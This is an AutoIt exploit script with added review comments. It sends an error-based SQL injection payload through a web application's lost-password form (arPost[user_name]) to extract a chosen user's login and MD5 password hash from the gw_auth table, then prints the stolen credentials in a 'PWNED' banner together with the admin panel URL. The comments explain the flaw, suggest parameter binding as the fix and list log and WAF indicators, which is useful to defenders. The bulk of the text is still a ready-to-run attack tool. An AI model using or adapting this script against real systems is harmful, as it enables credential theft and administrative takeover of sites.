; Argument handling and pre-flight requests for the script (AutoIt).
; $CmdLine[0] is the argument count; the three values are only assigned when
; exactly three arguments are given. $useragent and $adminpanel are defined
; outside the lines shown here.
if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$installdir=$CmdLine[2];
; The third argument is truncated to 255 characters and coerced with Number(),
; so the value later concatenated into the request body is the converted
; number, not the raw argument text.
$uidtoattack=Number(StringMid($CmdLine[3],1,255));
EndIf
; The digit check runs on the already-converted value (see Number() above).
if not StringIsDigit($uidtoattack) Then
ConsoleWrite(' UID is wrong! Exit' );
Exit;
EndIf
; Flag 8 strips all whitespace, so this rejects empty or blank-only site and
; directory arguments.
if StringStripWS($targetsite,8)='' OR StringStripWS($installdir,8)='' Then
ConsoleWrite('Are you kidding meeeeen?');
Exit;
EndIf
; Every request below carries the script-chosen User-Agent string, so the
; User-Agent seen in server logs is whatever $useragent holds.
HttpSetUserAgent($useragent)
; Plain GET of the target, used only as a reachability test: @error must be
; read immediately after InetGet, before another call resets it.
$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Incorrect Domain Name/Or you are Offline! [*]' & @CRLF)
Exit;
EndIf
; Random integer pause of 1200-2500 ms between requests. For log review: the
; requests from one run are spaced seconds apart rather than back-to-back.
sleep(Random(1200,2500,1));
; sendfakeretrivevalidsess() is not defined in the lines shown; from its name
; it presumably requests a page to obtain a valid session id - confirm against
; its definition.
sendfakeretrivevalidsess($targetsite,$installdir)
HttpSetUserAgent($useragent);
; Fetches the source of the admin panel URL as a string. $sidentify is not
; used anywhere in the lines shown.
$sidentify=_INetGetSource($targetsite & $adminpanel,True);
; exploit($targetsite, $installdir, $sessid)
; Sends a single form-encoded POST to $installdir & $vulnurl ($vulnurl is
; defined outside the lines shown) and scans the response body for a marker.
;   $targetsite - host passed to _WinHttpConnect
;   $installdir - path prefix of the application
;   $sessid     - value placed in the sid= form field
; $uidtoattack, $useragent, $adminpanel and $triptrop are read from script
; scope, not passed in. No value is returned; results go to the console.
;
; Review notes (defensive reading of the request built below):
;  - The request is the lost-password form (a=lostpass). The arPost[user_name]
;    field closes a quoted SQL string and appends a subquery, so the server
;    side is evidently concatenating that field into a SQL statement; binding
;    it as a query parameter removes the issue.
;  - The floor(rand(0)*2) ... group by x construct only yields data when the
;    database error text is echoed in the HTTP response, which is what the
;    marker search below relies on. Suppressing database error output to
;    clients removes that channel but does not fix the injection itself.
;  - 0x3C73696B6469723E and 0x3C2F73696B6469723E decode to "<sikdir>" and
;    "</sikdir>"; 0x7c is "|". They wrap login|password read from gw_auth.
;  - Log/WAF indicators visible in this body: information_schema.tables,
;    floor(rand(0)*2), gw_auth and user_email=trueownage in a POST to the
;    lost-password handler; "<sikdir>" appearing in a response body.
Func exploit($targetsite,$installdir,$sessid)
; Global inside a Func declares script-scope variables, so these persist
; after the call. $sAddress is not used again in the lines shown.
Global $sAddress = $targetsite
Global $PAYLOADTOSEND ="arPost[user_name]=') AND (select floor(rand(0)*2) from(select count(*)," & _
"concat((select concat(0x3C73696B6469723E,login,0x7c,password,0x3C2F73696B6469723E,0x7c) from " & _
"gw_auth where id_auth=" & $uidtoattack & "),floor(rand(0)*2))x from information_schema.tables group by x)a)-- " & _
" AND 1=('1&arPost[user_email]=trueownage&a=lostpass&sid=" & $sessid & "&post=Send password";
Global $sDomain = $targetsite
Global $sPage = $installdir & $vulnurl
Global $sAdditionalData = $PAYLOADTOSEND
; WinHttp UDF sequence: session -> connection -> POST request -> send body.
; None of the returned handles or call results are checked for failure.
Global $hOpen = _WinHttpOpen($useragent)
Global $hConnect = _WinHttpConnect($hOpen, $sDomain)
Global $hRequest = _WinHttpOpenRequest($hConnect, "POST", $sPage, -1, -1, -1, '')
_WinHttpSendRequest($hRequest, "Content-Type: application/x-www-form-urlencoded", $sAdditionalData)
_WinHttpReceiveResponse($hRequest)
Global $sReturned
; If no response data is available the function prints nothing and falls
; through to the handle cleanup.
If _WinHttpQueryDataAvailable($hRequest) Then
; Accumulate the body chunk by chunk; the loop ends when the read sets @error,
; so the @error test must stay directly after _WinHttpReadData.
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error
; Both markers present means the server reflected the concatenated value.
if StringInStr($sReturned,'<sikdir>') and StringInStr($sReturned,'</sikdir>') Then
; Flag 1 returns an array of the captured text between the markers.
$zsuxxv = StringRegExp($sReturned, '<(?i)sikdir>(.*?)</(?i)sikdir>', 1)
For $x = 0 To UBound($zsuxxv) - 1
Beep(100,1000);
; Prints a banner with the part before '|' as the login and the remainder as
; the password, which the author labels "(MD5)". The hash is written to the
; console in clear; if the label is accurate (unsalted MD5 - confirm against
; the application), accounts read this way should be treated as compromised
; and their credentials rotated.
ConsoleWrite($triptrop & '[*] !~ P*W*N*E*D ~! [*] ' & _
StringReplace($triptrop,'#','-') & '[*] Login: ' & StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1) & _
_StringRepeat(' ',StringLen($triptrop)-18-StringLen(StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1))) & '[*]' & _
StringReplace($triptrop,'#','-') & '[*] Password: (MD5) ' & StringReplace($zsuxxv[$x],StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')),'') & _
' [*] ' & _
StringReplace($triptrop,'#','-') & _
'Admin Panel: ' & $targetsite & $installdir &$adminpanel & ' ' & StringReplace($triptrop,'#','-') & _
'[*] Good Luck;) [*]' & _
$triptrop & '[*] DONE [*]' & _
$triptrop);
Next
Else
; Markers absent: reported as an unknown id. The same branch is taken whenever
; the response does not contain the marker text, whatever the reason. Exit
; here ends the script before the _WinHttpCloseHandle calls below run.
ConsoleWrite($triptrop & '[*] ' & _StringRepeat(' ',18) & ' NO SUCH UID! ' & _StringRepeat(' ',18) & _
' [*]' & $triptrop);
Beep(1500,1000);
Exit
EndIf
EndIf
; Release handles in reverse order of creation.
_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)
EndFunc;=> exploit();